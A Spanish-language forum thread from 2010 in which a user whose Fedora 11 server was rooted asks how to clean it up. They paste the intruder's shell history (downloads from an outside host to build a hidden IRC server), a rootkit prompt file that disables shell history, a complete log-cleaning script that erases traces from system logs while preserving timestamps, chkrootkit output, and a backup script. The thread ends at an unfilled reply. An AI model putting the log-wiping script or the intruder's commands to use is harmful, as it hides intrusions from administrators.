Mi servidor Fedora 11 ha sido hackeado. ¿Cómo limpio?

Todos los temas relacionados con la seguridad en Linux

Moderadores: doc, ps-ax

Responder
Darkness2010
Forista Nuevo
Forista Nuevo
Mensajes: 4
Registrado: Vie Sep 10, 2010 1:23 pm

Mi servidor Fedora 11 ha sido hackeado. ¿Cómo limpio?

Mensaje por Darkness2010 » Vie Sep 10, 2010 3:14 pm

Hola,

A ver si alguien puede echarme una mano, ya que han atacado mi PC y ahora no sé bien qué hacer para limpiarlo!!! Además, agradecería algun consejo para protegerlo, además de utilizar una clave mucho mejor para todos los usuarios...


Esta mañana descubrí que la clave de root había cambiado, así que me he dado cuenta de que anoche alguien entró a las 4 al servidor.

Vi que se había creado un usuario con el nombre "c" y en el log del bash_history ponía esto:

cd /tmp
wget http://www.unrealircd.com/downloads/Unr ... 8.1.tar.gz
tar -zxvf Unreal3.2.8.1.tar.gz
ls
rm -fr Unreal3.2.8.1.tar.gz
cd Unreal3.2
./Config
make
cd src/modules
wget http://unknown.me.uk/hideserver.c
wget http://unknown.me.uk/hideserver.so
cd ..
cd ..
make custommodule MODULEFILE=hideserver
wget http://unknown.me.uk/ircd.motd
wget http://unknown.me.uk/antirandom.tar.gz
tar zxvf antirandom.tar.gz
pwd
cd AntiRandom-1.1
./build
cd ..
./unreal start
exit
Por otra parte, he buscado los archivos que se modificaron a las horas a las que fue el ataque (sobre las 4), así que buscando entre la 1 y las 5 me salen los archivos que indico al final del post.

Además, viendo el contenido de /usr/lib/libsh/.bashrc aparece esto:
## lets make our PROMPT leet
## dont u want so ? heh
## by: PinT[x] 2003


# colors

RED=''
WHI=''
DCYN=''
RES=''
# variables

unset HISTFILE;unset HISTSAVE;unset HISTFILESIZE
export ID=$LOGNAME
export MACHINE="SH-crew"
export PS1="\[\033[0;36m\][\$ID@\[\033[1;37m\]\$MACHINE\[\033[0m\]\[\033[0;36m\]:\${PWD}]#\[\033[0m\
] "

# prompt with time-stamps
# uncomment if u want

# export PS1="[\t][\u@\h:\w]\$ "

# enable colour ls

COLORS=/etc/DIR_COLORS
eval `dircolors --sh /etc/DIR_COLORS`
[ -f "$HOME/.dircolors" ] && eval `dircolors --sh $HOME/.dircolors` && COLORS=$HOME/.dircolors

if echo $SHELL |grep bash 2>&1 >/dev/null; then # aliases are bash only
if ! egrep -qi "^COLOR.*none" $COLORS &>/dev/null; then
alias ll='ls -l --color=tty'
alias l.='ls -d .[a-zA-Z]* --color=tty'
alias ls='ls --color=tty'
else
alias ll='ls -l'
alias l.='ls -d .[a-zA-Z]*'
fi
fi

## we even got motd
## admin wont belive this

echo ""
echo "${DCYN}[${WHI}sh${DCYN}] ${WHI} w.e.l.c.o.m.e ${RES}"
echo "${DCYN}[${WHI}sh${DCYN}] ${WHI} To The Virtual Reality ${RES}"
echo "${DCYN}[${WHI}sh${DCYN}] ${WHI} Enjoy and behave ! ${RES}"
echo ""
Además, hay un archivo llamado /usr/lib/libsh/hide que contiene esto:
#!/bin/bash

echo " Linux Hider v2.0 by mave"
echo " enhanced by me! "
echo "[+] [Shkupi Logcleaner] Removing $1 from the logs........ ."
echo ""

if [ -f /var/log/maillog ]; then
cat /var/log/maillog | grep -v $1 > /tmp/maillog.xz
touch -acmr /var/log/maillog /tmp/maillog.xz
mv -f /tmp/maillog.xz /var/log/maillog
echo "[+] /var/log/maillog ... [done]"
echo ""
fi

if [ -f /var/log/messages ]; then
cat /var/log/messages | grep -v $1 > /tmp/messages.xz
touch -acmr /var/log/messages /tmp/messages.xz
mv -f /tmp/messages.xz /var/log/messages
echo "[+] /var/log/messages ... [done]"
sleep 2
echo ""
fi

if [ -f /var/log/secure ]; then
cat /var/log/secure | grep -v $1 > /tmp/secure.xz
touch -acmr /var/log/secure /tmp/secure.xz
mv -f /tmp/secure.xz /var/log/secure
echo "[+] /var/log/secure ... [done]"
echo ""
fi

if [ -f /var/log/xferlog ]; then
cat /var/log/xferlog | grep -v $1 > /tmp/xferlog.xz
touch -acmr /var/log/xferlog /tmp/xferlog.xz
mv -f /tmp/xferlog.xz /var/log/xferlog
sleep 2
echo "[+] /var/log/xferlog ... [done]"
echo ""
fi

if [ -f /var/run/utmp ]; then
cat /var/run/utmp | grep -v $1 > /tmp/utmp.xz
touch -acmr /var/run/utmp /tmp/utmp.xz
mv -f /tmp/utmp.xz /var/run/utmp
echo "[+] /var/run/utmp ... [done]"
echo ""
fi

if [ -f /var/log/lastlog ]; then
cat /var/log/lastlog |grep -v $1 > /tmp/lastlog.xz
touch -acmr /var/log/lastlog /tmp/lastlog.xz
mv -f /tmp/lastlog.xz /var/log/lastlog
sleep 2
echo "[+] /var/log/lastlog ... [done]"
echo ""
fi

if [ -f /var/log/wtmp ]; then
cat /var/log/wtmp |grep -v $1 > /tmp/wtmp.xz
touch -acmr /var/log/wtmp /tmp/wtmp.xz
mv -f /tmp/wtmp.xz /var/log/wtmp
echo "[+] /var/log/wtmp ... [done]"
echo ""
fi

rm -f /tmp/*.xz
echo " * m i s s i o n a c c o m p l i s h e d *"
echo ""
sleep 2
echo " p.h.e.e.r S.H.c.r.e.w"
echo ""
sleep 5
exit 1
# EOF
[/quote]


Además de otras cosillas raras por ahí....

He pasado una utilidad que encontré que se llama chkrootkit y esta es la salida que da:
ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `crontab'... not infected
Checking `date'... not infected
Checking `du'... not infected
Checking `dirname'... not infected
Checking `echo'... not infected
Checking `egrep'... not infected
Checking `env'... not infected
Checking `find'... not infected
Checking `fingerd'... not found
Checking `gpm'... not infected
Checking `grep'... not infected
Checking `hdparm'... not infected
Checking `su'... not infected
Checking `ifconfig'... INFECTED
Checking `inetd'... Unknown HZ value! (785) Assume 100.
Warning: /boot/System.map-2.6.30.10-105.2.23.fc11.x86_64 has an incorrect kernel version.
not tested
Checking `inetdconf'... not found
Checking `identd'... not found
Checking `init'... not infected
Checking `killall'... not infected
Checking `ldsopreload'... not infected
Checking `login'... not infected
Checking `ls'... not infected
Checking `lsof'... not infected
Checking `mail'... not infected
Checking `mingetty'... not infected
Checking `netstat'... INFECTED
Checking `named'... not found
Checking `passwd'... not infected
Checking `pidof'... not infected
Checking `pop2'... not found
Checking `pop3'... not found
Checking `ps'... not infected
Checking `pstree'... INFECTED
Checking `rpcinfo'... not infected
Checking `rlogind'... not found
Checking `rshd'... not found
Checking `slogin'... not infected
Checking `sendmail'... not infected
Checking `sshd'... Unknown HZ value! (785) Assume 100.
Warning: /boot/System.map-2.6.30.10-105.2.23.fc11.x86_64 has an incorrect kernel version.
not infected
Checking `syslogd'... not tested
Checking `tar'... not infected
Checking `tcpd'... Unknown HZ value! (785) Assume 100.
Warning: /boot/System.map-2.6.30.10-105.2.23.fc11.x86_64 has an incorrect kernel version.
not infected
Checking `tcpdump'... not infected
Checking `top'... INFECTED
Checking `telnetd'... not found
Checking `timed'... not found
Checking `traceroute'... not infected
Checking `vdir'... not infected
Checking `w'... not infected
Checking `write'... not infected
Checking `aliens'... no suspect files
Searching for sniffer's logs, it may take a while... nothing found
Searching for HiDrootkit's default dir... nothing found
Searching for t0rn's default files and dirs... nothing found
Searching for t0rn's v8 defaults... Possible t0rn v8 \(or variation\) rootkit installed
Searching for Lion Worm default files and dirs... nothing found
Searching for RSHA's default files and dir... nothing found
Searching for RH-Sharpe's default files... nothing found
Searching for Ambient's rootkit (ark) default files and dirs... nothing found
Searching for suspicious files and dirs, it may take a while...
/usr/lib/libsh/.bashrc /usr/lib/libsh/.owned /usr/lib/libsh/.sniff /usr/lib/libsh/.backup /lib/.libg
crypt.so.11.hmac
/usr/lib/libsh/.owned /usr/lib/libsh/.sniff /usr/lib/libsh/.backup
Searching for LPD Worm files and dirs... nothing found
Searching for Ramen Worm files and dirs... nothing found
Searching for Maniac files and dirs... nothing found
Searching for RK17 files and dirs... nothing found
Searching for Ducoci rootkit... nothing found
Searching for Adore Worm... nothing found
Searching for ShitC Worm... nothing found
Searching for Omega Worm... nothing found
Searching for Sadmind/IIS Worm... nothing found
Searching for MonKit... nothing found
Searching for Showtee... Warning: Possible Showtee Rootkit installed
Searching for OpticKit... nothing found
Searching for T.R.K... nothing found
Searching for Mithra... nothing found
Searching for LOC rootkit... nothing found
Searching for Romanian rootkit... /usr/include/file.h /usr/include/proc.h
Searching for HKRK rootkit... nothing found
Searching for Suckit rootkit... nothing found
Searching for Volc rootkit... nothing found
Searching for Gold2 rootkit... nothing found
Searching for TC2 Worm default files and dirs... nothing found
Searching for Anonoying rootkit default files and dirs... nothing found
Searching for ZK rootkit default files and dirs... nothing found
Searching for ShKit rootkit default files and dirs... nothing found
Searching for AjaKit rootkit default files and dirs... nothing found
Searching for zaRwT rootkit default files and dirs... nothing found
Searching for Madalin rootkit default files... nothing found
Searching for Fu rootkit default files... nothing found
Searching for ESRK rootkit default files... nothing found
Searching for rootedoor... nothing found
Searching for ENYELKM rootkit default files... nothing found
Searching for common ssh-scanners default files... nothing found
Searching for suspect PHP files... nothing found
Searching for anomalies in shell history files... nothing found
Checking `asp'... not infected
Checking `bindshell'... not infected
Checking `lkm'... Unknown HZ value! (785) Assume 100.
Warning: /boot/System.map-2.6.30.10-105.2.23.fc11.x86_64 has an incorrect kernel version.
You have 189 process hidden for readdir command
You have 190 process hidden for ps command

chkproc: Warning: Possible LKM Trojan installed
chkdirs: nothing detected
Checking `rexedcs'... not found
Checking `sniffer'... eth0: not promisc and no PF_PACKET sockets
Checking `w55808'... not infected
Checking `wted'... chkwtmp: nothing deleted
Checking `scalper'... not infected
Checking `slapper'... not infected
Checking `z2'... chklastlog: nothing deleted
Checking `chkutmp'... Unknown HZ value! (785) Assume 100.
Warning: /boot/System.map-2.6.30.10-105.2.23.fc11.x86_64 has an incorrect kernel version.
The tty of the following user process(es) were not found
in /var/run/utmp !
! RUID PID TTY CMD
! root 9595 tty1 /usr/bin/Xorg :0 -nr -verbose -auth /var/run/gdm/auth-fo
chkutmp: nothing deleted
Checking `OSX_RSPLUG'... not infected

¿De qué modo puedo actuar ahora para arreglar el estropicio?

MUCHAS GRACIAS!!

Un saludo.


Los archivos que creo que fueron modificados a la hora del ataque, si es que ejecuté bien el comando. Instala el Unreal nosequé en la carpeta /temp/., y lo que sale antes supongo que es con lo que consigue la clave de root....

/usr/sbin
/usr/sbin/ttyload
/usr/sbin/lsof
/usr/include
/usr/include/proc.h
/usr/include/hosts.h
/usr/include/log.h
/usr/include/file.h
/usr/bin
/usr/bin/md5sum
/usr/bin/top
/usr/bin/pstree
/usr/bin/dir
/usr/bin/find
/usr/lib/libsh
/usr/lib/libsh/.bashrc
/usr/lib/libsh/utilz
/usr/lib/libsh/utilz/mirk.tgz
/usr/lib/libsh/utilz/synscan.tgz
/usr/lib/libsh/.sniff
/usr/lib/libsh/.sniff/shp
/usr/lib/libsh/.sniff/shsniff
/usr/lib/libsh/hide
/usr/lib/libsh/.backup
/usr/lib/libsh/.backup/ifconfig
/usr/lib/libsh/.backup/md5sum
/usr/lib/libsh/.backup/ps
/usr/lib/libsh/.backup/lsof
/usr/lib/libsh/.backup/top
/usr/lib/libsh/.backup/netstat
/usr/lib/libsh/.backup/pstree
/usr/lib/libsh/.backup/dir
/usr/lib/libsh/.backup/ls
/usr/lib/libsh/.backup/find
/usr/lib/libsh/shsb
/etc/passwd
/etc/inittab
/etc/rc.d
/etc/rc.d/rc.sysinit
/etc/gshadow-
/etc/shadow-
/etc/group
/etc/sh.conf
/etc/passwd-
/etc/ld.so.cache
/etc/group-
/etc/gshadow
/etc/prelink.cache
/tmp/virtual-cadence_cicyt2010_65nm.EWK00r
/tmp/keyring-RFgb58
/tmp/keyring-7IrQnb
/tmp/keyring-kptaSO
/tmp/keyring-XFq4M3
/tmp/virtual-software.oYIUXb
/tmp/keyring-Lg9RDI
/tmp/keyring-DflP6K
/tmp/pulse-1rNAcz6udm8f
/tmp/virtual-jatorreno.63XKC5
/tmp/keyring-VPk7S0
/tmp/keyring-HDMDGG
/tmp/keyring-Klv4Ra
/tmp/keyring-ttheUI
/tmp/keyring-x5qlJe
/tmp/keyring-aqZ8rT
/tmp/keyring-otf3ux
/tmp/keyring-1PIZZg
/tmp/keyring-H1Cf1Z
/tmp/keyring-ePIdIc
/tmp/keyring-Cq2GSH
/tmp/.esd-516
/tmp/keyring-aTNvys
/tmp/keyring-dD7CcF
/tmp/keyring-YUtpbe
/tmp/keyring-vqsYC8
/tmp/keyring-1OqfOU
/tmp/keyring-IDYmYk
/tmp/keyring-I6k9bX
/tmp/keyring-yxHJDK
/tmp/keyring-Tgclt9
/tmp/keyring-EEZ8Rr
/tmp/keyring-gx29BJ
/tmp/keyring-sFC3O6
/tmp/.esd-0
/tmp/keyring-OrFMPo
/tmp/keyring-GBM4h2
/tmp/keyring-cVi34v
/tmp/keyring-Z4fj8u
/tmp/keyring-ZN88Hq
/tmp/keyring-VVzuef
/tmp/keyring-f6tyBb
/tmp/keyring-Qq42za
/tmp/keyring-41XXWN
/tmp/keyring-mQycnh
/tmp/keyring-v5S5if
/tmp/keyring-EqL2SG
/tmp/keyring-FYuqzJ
/tmp/keyring-OyG9Rh
/tmp/keyring-L5Gpwc
/tmp/keyring-Eqzspi
/tmp/virtual-spaton.4JHNpc
/tmp/keyring-aR4Kvf
/tmp/keyring-qLvs6F
/tmp/keyring-6Huwcd
/tmp/keyring-TiPWap
/tmp/keyring-jUpQd4
/tmp/keyring-3jw2eY
/tmp/keyring-9AxWlk
/tmp/keyring-OBFp1e
/tmp/keyring-S1vuE4
/tmp/keyring-VrSMsf
/tmp/keyring-SSc2Lu
/tmp/keyring-BXmawa
/tmp/keyring-GQb0R4
/tmp/keyring-JRi1pW
/tmp/virtual-epun.5htuLh
/tmp/keyring-3aTMoh
/tmp/keyring-o2MmUm
/tmp/keyring-AbT1fi
/tmp/keyring-W6P05b
/tmp/keyring-eFAPZ6
/tmp/keyring-5RO3Mc
/tmp/keyring-yZYGue
/tmp/keyring-dHrFMo
/tmp/keyring-4jV86q
/tmp/keyring-VnsG7h
/tmp/keyring-FaZJEe
/tmp/keyring-7lmVdi
/tmp/keyring-L0KeaE
/tmp/keyring-wmHJWz
/tmp/keyring-B0MQvk
/tmp/keyring-qth26q
/tmp/pulse-qXZpg93ghu9k
/tmp/keyring-4JELbh
/tmp/keyring-Inm1r8
/tmp/keyring-5vX6ci
/tmp/keyring-OlvtZP
/tmp/keyring-yJ6ek2
/tmp/keyring-nFcl57
/tmp/keyring-dHIzRR
/tmp/keyring-Hi60gh
/tmp/keyring-pvf86x
/tmp/keyring-EaJJtT
/tmp/keyring-elrYpa
/tmp/keyring-ephEkg
/tmp/keyring-S059DI
/tmp/keyring-ZjiDAA
/tmp/keyring-n7uYV8
/tmp/keyring-mtiGKf
/tmp/keyring-mzQ26O
/tmp/keyring-FCZzof
/tmp/keyring-mYI7xa
/tmp/keyring-6tywk0
/tmp/keyring-Ykq8Bl
/tmp/virtual-cadence.3hrpmc
/tmp/keyring-1rMd7i
/tmp/keyring-zY9xdp
/tmp/.,
/tmp/.,/newnet
/tmp/.,/README
/tmp/.,/ircdcron
/tmp/.,/ircdcron/ircdchk
/tmp/.,/ircdcron/ircdchk.in
/tmp/.,/ircdcron/CVS
/tmp/.,/ircdcron/CVS/Entries
/tmp/.,/ircdcron/CVS/Repository
/tmp/.,/ircdcron/CVS/Tag
/tmp/.,/ircdcron/CVS/Root
/tmp/.,/ircdcron/ircd.cron
/tmp/.,/badwords.quit.conf
/tmp/.,/dccallow.conf
/tmp/.,/Changes.old
/tmp/.,/unrealircd.conf
/tmp/.,/autoconf
/tmp/.,/autoconf/Makefile
/tmp/.,/autoconf/CVS
/tmp/.,/autoconf/CVS/Entries
/tmp/.,/autoconf/CVS/Repository
/tmp/.,/autoconf/CVS/Tag
/tmp/.,/autoconf/CVS/Root
/tmp/.,/autoconf/aclocal.m4
/tmp/.,/autoconf/configure.in
/tmp/.,/Donation

[...]

/tmp/.,/src/s_err.o
/tmp/.,/src/s_conf.o
/tmp/.,/doc
/tmp/.,/doc/unreal32docs.hu.html
/tmp/.,/doc/help.ru.conf
/tmp/.,/doc/coding-guidelines
/tmp/.,/doc/example.tr.conf
/tmp/.,/doc/unreal32docs.tr.html
/tmp/.,/doc/unreal32docs.nl.html
/tmp/.,/doc/example.conf
/tmp/.,/doc/example.ru.conf
/tmp/.,/doc/help.de.conf
/tmp/.,/doc/technical
/tmp/.,/doc/technical/base64.txt
/tmp/.,/doc/technical/005.txt
/tmp/.,/doc/technical/serverprotocol.html
/tmp/.,/doc/technical/protoctl.txt
/tmp/.,/doc/technical/token.txt
/tmp/.,/doc/technical/CVS
/tmp/.,/doc/technical/CVS/Entries
/tmp/.,/doc/technical/CVS/Repository
/tmp/.,/doc/technical/CVS/Tag
/tmp/.,/doc/technical/CVS/Root
/tmp/.,/doc/technical/vl.txt
/tmp/.,/doc/unreal32docs.html
/tmp/.,/doc/tao.of.irc
/tmp/.,/doc/unreal32docs.de.html
/tmp/.,/doc/unreal32docs.es.html
/tmp/.,/doc/Authors
/tmp/.,/doc/unreal32docs.gr.html
/tmp/.,/doc/example.hu.conf
/tmp/.,/doc/help.fr.conf
/tmp/.,/doc/example.de.conf
/tmp/.,/doc/translations.txt
/tmp/.,/doc/unreal32docs.ru.html
/tmp/.,/doc/help.tr.conf
/tmp/.,/doc/CVS
/tmp/.,/doc/CVS/Entries
/tmp/.,/doc/CVS/Repository
/tmp/.,/doc/CVS/Entries.Log
/tmp/.,/doc/CVS/Tag
/tmp/.,/doc/CVS/Root
/tmp/.,/doc/compiling_win32.txt
/tmp/.,/doc/example.fr.conf
/tmp/.,/doc/unreal32docs.fr.html
/tmp/.,/doc/example.nl.conf
/tmp/.,/networks
/tmp/.,/networks/chatcrap.network
/tmp/.,/networks/global-irc.network
/tmp/.,/networks/ircsystems.network
/tmp/.,/networks/unreal-test.network
/tmp/.,/networks/l33t-irc.network
/tmp/.,/networks/chatuniverse.network
/tmp/.,/networks/icechat.network
/tmp/.,/networks/german-elite.network
/tmp/.,/networks/outsiderz.network
/tmp/.,/networks/darkkaos.network
/tmp/.,/networks/dragonwings.network
/tmp/.,/networks/awesomechristians.network
/tmp/.,/networks/gamescafe.network
/tmp/.,/networks/infinity.network
/tmp/.,/networks/wazzza.network
/tmp/.,/networks/isno.network
/tmp/.,/networks/makenet
/tmp/.,/networks/template.network
/tmp/.,/networks/CVS
/tmp/.,/networks/CVS/Entries
/tmp/.,/networks/CVS/Repository
/tmp/.,/networks/CVS/Tag
/tmp/.,/networks/CVS/Root
/tmp/.,/networks/thainet.network
/tmp/.,/networks/zirc.network
/tmp/.,/networks/burnnet.network
/tmp/.,/networks/stormdancing.network
/tmp/.,/networks/lcirc.network
/tmp/.,/networks/axenet.network
/tmp/.,/networks/german-global-irc.network
/tmp/.,/networks/discussioni.network
/tmp/.,/networks/unitedirc-org.network
/tmp/.,/networks/globalchat.network
/tmp/.,/networks/cabonet.network
/tmp/.,/networks/digitalirc.network
/tmp/.,/networks/x-irc.network
/tmp/.,/networks/networks.ndx
/tmp/.,/networks/bunker7.network
/tmp/.,/networks/ctcp.network
/tmp/.,/networks/phazenet.network
/tmp/.,/unreal.in
/tmp/.,/.cvsignore
/tmp/.,/Changes
/tmp/keyring-PV7hEg
/tmp/keyring-JQMVHj
/tmp/keyring-5Y6s0o
/tmp/keyring-s5muwy
/tmp/keyring-VgDXFW
/tmp/keyring-Aph2PV
/tmp/keyring-W1Igil
/tmp/virtual-eprefasi.dwktMf
/tmp/keyring-rZ51Gk
/tmp/keyring-w1XBo6
/tmp/keyring-gmf72H
/tmp/keyring-kDIUJ6
/tmp/keyring-usxVBQ
/tmp/keyring-NYVHpy
/tmp/keyring-UlaMaC
/tmp/keyring-gi0dVA
/tmp/keyring-cWxFnl
/tmp/keyring-0lGdKt
/tmp/behsdf
/tmp/keyring-Br5yZp
/tmp/keyring-fRCnE1
/tmp/keyring-oWDJXd
/tmp/keyring-vBPil9
/tmp/keyring-AUAc6a
/tmp/keyring-vRxv8H
/tmp/keyring-ZTdCKY
/tmp/keyring-utg3ts
/tmp/keyring-BslJyQ
/tmp/keyring-bC2rtb
/tmp/keyring-1xNvnI
/tmp/keyring-DkERMY
/tmp/keyring-L5FX79
/tmp/keyring-eKiYG5
/tmp/keyring-B1fNXv
/tmp/keyring-BjdN9x
/tmp/keyring-Gj5Ilh
/tmp/keyring-zAMesH
/tmp/keyring-BC8HSH
/tmp/virtual-jfrutos.eMbpKZ
/tmp/virtual-lhernandez.BSbpXb
/tmp/keyring-a6Bcay
/tmp/keyring-Fx3wPf
/tmp/keyring-BMdYfa
/tmp/keyring-JmvFkI
/tmp/keyring-IBME4X
/tmp/virtual-drodriguez.QMVhWh
/var/spool/mail
/var/spool/mail/c
/var/spool/clientmqueue
/var/spool/clientmqueue/dfo8A2O3PA019321
/var/spool/clientmqueue/dfo8A1sZjn017709
/var/spool/clientmqueue/qfo8A1sZjn017709
/var/spool/clientmqueue/qfo8A2O3PA019321
/var/spool/cups/tmp
/var/cache/logwatch
/var/cache/man/cat3
/var/cache/man/cat5
/var/cache/man/cat4
/var/cache/man/whatis
/var/cache/man/catn
/var/cache/man/cat2
/var/cache/man/cat1
/var/cache/man/X11R6/cat3
/var/cache/man/X11R6/cat5
/var/cache/man/X11R6/cat4
/var/cache/man/X11R6/catn
/var/cache/man/X11R6/cat2
/var/cache/man/X11R6/cat1
/var/cache/man/X11R6/cat6
/var/cache/man/X11R6/cat8
/var/cache/man/X11R6/cat7
/var/cache/man/X11R6/cat9
/var/cache/man/cat6
/var/cache/man/local/cat3
/var/cache/man/local/cat5
/var/cache/man/local/cat4
/var/cache/man/local/catn
/var/cache/man/local/cat2
/var/cache/man/local/cat1
/var/cache/man/local/cat6
/var/cache/man/local/cat8
/var/cache/man/local/cat7
/var/cache/man/local/cat9
/var/cache/man/cat8
/var/cache/man/cat7
/var/cache/man/cat9
/var/cache/ldconfig
/var/cache/ldconfig/aux-cache
/var/log/faillog
/var/log/prelink/prelink.log
/var/log/xferlog
/var/log/maillog
/var/log/lastlog
/var/log/rpmpkgs
/var/lib/logrotate.status
/var/lib/readahead/early.sorted
/var/lib/misc/prelink.quick
/var/lib/misc/prelink.full
/var/lib/mlocate
/var/lib/mlocate/mlocate.db
/sbin
/sbin/ifconfig
/sbin/ttyload
/sbin/ttymon
/home
Avatar de Usuario
pataro
Forista Medio
Forista Medio
Mensajes: 341
Registrado: Vie Abr 18, 2008 7:00 am
Ubicación: Buenos Aires
Contactar:

Re: Mi servidor Fedora 11 ha sido hackeado. ¿Cómo limpio?

Mensaje por pataro » Vie Sep 10, 2010 4:15 pm

Pon un CD de Debian e instala todo nuevamente.

Que acido estoy hoy por favorrrrrrrrrrrrrrrrrrrrrrrr, ni yo me aguanto.
Darkness2010
Forista Nuevo
Forista Nuevo
Mensajes: 4
Registrado: Vie Sep 10, 2010 1:23 pm

Re: Mi servidor Fedora 11 ha sido hackeado. ¿Cómo limpio?

Mensaje por Darkness2010 » Vie Sep 10, 2010 4:22 pm

pataro escribió:Pon un CD de Debian e instala todo nuevamente.

Que acido estoy hoy por favorrrrrrrrrrrrrrrrrrrrrrrr, ni yo me aguanto.
Ojalá fuera tan fácil, pero es una opción a evitar en la medida de lo posible, debido a los programas y la información del PC, además de que es necesario que el servidor esté funcionando...

Muchas gracias de todos modos.



Por otra parte, quien se encargaba del servidor anteriormente, tenia preparado un script que hace un backup diario del disco duro completo en otro disco que se monta y desmonta. Supongo que lo mas cómodo sería recuperar el sistema desde ahí. El problema es que no tengo ni idea de cómo se hace... este es el script de backup:
#!/bin/bash
#Este script realiza y backup del directorio especificado en el primer par?metro
#y lo deja comprimido en el directorio especificado en el segundo par?metro.
DIA_SEMANA=`date +%u`
FICHERO=""

dia=`date| awk '{print $3}'`
mes=`date| awk '{print $2}'`
ano=`date| awk '{print $6}'`
LOG_PATH=/root/logs_backups
LOG=$LOG_PATH/backup_${ano}_${mes}_${dia}.log
FILE_PATH=/root/flag_backups
DUMP=/sbin/dump
echo "Dia de la semana" $DIA_SEMANA > $LOG

function level_day() {
filas=`expr $1 \* 2`
if [ `wc -l /etc/dumpdates | awk '{print $1}'` -lt $filas ];then
level=-1
else
level=`tail -$filas /etc/dumpdates |head -1|awk '{print $2}'`
fi
echo $level
}

case $DIA_SEMANA in
1)
echo "Haciendo backup del Lunes (nivel 3)..." >> $LOG
LEVEL=3
;;
2)
echo "Haciendo backup del Martes (nivel 2)..." >> $LOG
LEVEL=2
;;
3)
echo "Haciendo backup del Miercoles (nivel 5)..." >> $LOG
LEVEL=5
;;
4)
echo "Haciendo backup del Jueves (nivel 4)..." >> $LOG
LEVEL=4
;;
5)
echo "Haciendo backup del Viernes (nivel 7)..." >> $LOG
LEVEL=7
;;
6)
echo "Haciendo backup del Sábado (nivel 6)..." >> $LOG
LEVEL=6
;;
7)
#echo nivel leido $nivel >> $LOG
#if [ $nivel -lt 0 ];then
# LEVEL=0;
#else
# if [ $nivel -eq 0 ];then
# LEVEL=1
# FICHERO=A
# else
# #Tenemos que ver cuantos de nivel 1 llevamos hechos desde el ultimo de nivel 0.
# check_day=7
# semanas_ultimo_nivel_cero=0
# while [ $nivel -eq 1 ]
# do
# semanas_ultimo_nivel_cero=`expr $semanas_ultimo_nivel_cero + 1`
# check_day=`expr $check_day + 7`
# echo comprobando día $check_day >> $LOG
# nivel=`level_day $check_day`
# echo nivel: $nivel >> $LOG
# done
#
# echo "semanas_ultimo_nivel_cero:" $semanas_ultimo_nivel_cero >> $LOG
#
# case $semanas_ultimo_nivel_cero in
# 1)
# LEVEL=1
# FICHERO=B
# ;;
# 2)
# LEVEL=1
# FICHERO=C
# ;;
# 3)
# LEVEL=0
# ;;
# *)
# LEVEL=0
# ;;
# esac
# fi
#fi
#echo "Haciendo backup del Domingo (nivel $LEVEL$FICHERO)..." >> $LOG
#;;
if [ -f $FILE_PATH\BACKUP0 ]; then
LEVEL=1
FICHERO=A
rm $FILE_PATH\BACKUP0
touch $FILE_PATH\BACKUP1A
else
if [ -f $FILE_PATH\BACKUP1A ]; then
LEVEL=1
FICHERO=B
rm $FILE_PATH\BACKUP1A
touch $FILE_PATH\BACKUP1B
else
if [ -f $FILE_PATH\BACKUP1B ]; then
LEVEL=1
FICHERO=C
rm $FILE_PATH\BACKUP1B
touch $FILE_PATH\BACKUP1C
else
if [ -f $FILE_PATH\BACKUP1C ]; then
LEVEL=0
rm $FILE_PATH\BACKUP1C
touch $FILE_PATH\BACKUP0
else
LEVEL=0
touch $FILE_PATH\BACKUP0
fi
fi
fi
fi
echo "Haciendo backup del Domingo (nivel $LEVEL$FICHERO)..." >> $LOG
esac
#averiguamos cual es el inodo del /mnt para excluirlo del backup.
inode=`stat --format=%i /mnt`
echo mount -t ext3 -o rw /dev/dm-2 /mnt/backup/ >> $LOG
mount -t ext3 -o rw /dev/dm-2 /mnt/backup/ >> $LOG 2>&1
echo $DUMP ${LEVEL}uf /mnt/backup/backup_root_$LEVEL$FICHERO.dmp -e $inode / >> $LOG
$DUMP ${LEVEL}uf /mnt/backup/backup_root_$LEVEL$FICHERO.dmp -e $inode / >> $LOG 2>&1
echo $DUMP ${LEVEL}uf /mnt/backup/backup_boot_$LEVEL$FICHERO.dmp /boot >> $LOG
$DUMP ${LEVEL}uf /mnt/backup/backup_boot_$LEVEL$FICHERO.dmp /boot >> $LOG 2>&1
echo umount /dev/dm-2 >> $LOG
umount /dev/dm-2 >> $LOG 2>&1

exit 0
Y estos los archivos de backup de los que dispongo en ese disco:

-rw-r--r-- 1 root root 27330560 Aug 15 02:56 backup_boot_0.dmp
-rw-r--r-- 1 root root 30720 Aug 22 00:03 backup_boot_1A.dmp
-rw-r--r-- 1 root root 30720 Aug 29 00:03 backup_boot_1B.dmp
-rw-r--r-- 1 root root 30720 Sep 5 00:03 backup_boot_1C.dmp
-rw-r--r-- 1 root root 30720 Sep 7 00:04 backup_boot_2.dmp
-rw-r--r-- 1 root root 30720 Sep 6 00:03 backup_boot_3.dmp
-rw-r--r-- 1 root root 30720 Sep 9 00:04 backup_boot_4.dmp
-rw-r--r-- 1 root root 30720 Sep 8 00:03 backup_boot_5.dmp
-rw-r--r-- 1 root root 30720 Sep 4 00:03 backup_boot_6.dmp
-rw-r--r-- 1 root root 30720 Sep 10 00:03 backup_boot_7.dmp
-rw-r--r-- 1 root root 196433920 Aug 22 00:03 backup_root_1A.dmp
-rw-r--r-- 1 root root 287395840 Aug 29 00:03 backup_root_1B.dmp
-rw-r--r-- 1 root root 256798720 Sep 5 00:03 backup_root_1C.dmp
-rw-r--r-- 1 root root 198113280 Sep 7 00:04 backup_root_2.dmp
-rw-r--r-- 1 root root 150702080 Sep 6 00:03 backup_root_3.dmp
-rw-r--r-- 1 root root 150978560 Sep 9 00:04 backup_root_4.dmp
-rw-r--r-- 1 root root 149217280 Sep 8 00:03 backup_root_5.dmp
-rw-r--r-- 1 root root 148121600 Sep 4 00:03 backup_root_6.dmp
-rw-r--r-- 1 root root 157081600 Sep 10 00:03 backup_root_7.dmp
drwx------ 2 root root 16384 Nov 6 2009 lost+found


Como se supone que sigue un algoritmo de torre de hanoi (o algo así) que desconozco como va, no sé si es sufiente con tirar del último backup o cómo coño.... y claro, no es cuestión de cargarse la info del PC... (crítica) asi que chungo :-(

¿Cómo se recupera desde los dmp el sistema completo?
Avatar de Usuario
hipersayan_x
Forista Legendario
Forista Legendario
Mensajes: 1905
Registrado: Vie Abr 27, 2007 7:00 am
Contactar:

Re: Mi servidor Fedora 11 ha sido hackeado. ¿Cómo limpio?

